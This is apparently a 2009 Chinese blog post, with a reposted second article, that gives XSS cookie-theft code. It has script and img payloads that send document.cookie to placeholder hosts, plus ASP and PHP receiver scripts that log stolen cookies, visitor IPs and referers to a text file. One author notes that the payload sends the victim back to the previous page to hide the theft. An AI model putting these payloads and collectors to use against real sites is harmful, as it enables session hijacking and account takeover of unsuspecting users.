|
<script>document.write('<img
src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0
border=0 />');</script>
news.asp代码:
<%
msg=Request.ServerVariables("QUERY_STRING")
testfile=Server.MapPath("cook.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.Writeline(""&msg& "")
thisfile.close
set fs = nothing
%>
news.php代码:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cook.txt', 'a');
fwrite($fp,
'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: '
.$time. '<br> Referer:
'.$referer.'<br><br><br>');
fclose($fp);
?>
作者:樱木花盗 发表于 2009-10-16 22:49:52
—————————————————————————————————————————————
另附叶子(http://www.yezishell.cn/)的一篇文章:
忙乎了半个小时写这句XSS代码,几个月没有复习快忘记的差不多了,这里给记录一下吧,自己要求的基本效果是不影响对方页面,所以必须加入一个返回的要求
在这个语句中可以自由变换其形,达到自己的要求即可
下面这句是用img的html元素写的,常用script已经不再流行了,往往更换一个类型可能更有意思
<img src=javascript:document.location='http://xxxxxxx/cookie.asp?msg='+escape(document.cookie);window.history.back(-1)>
上面的语句意思很简单,就是掉到cookie后返回前一页,达到隐藏的一个小目的
附cookie.asp欺骗代码:
<%
testfile=Server.MapPath("自定义文件.txt")
msg=Request("自定义数据表")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
|
推荐
评论(0条)
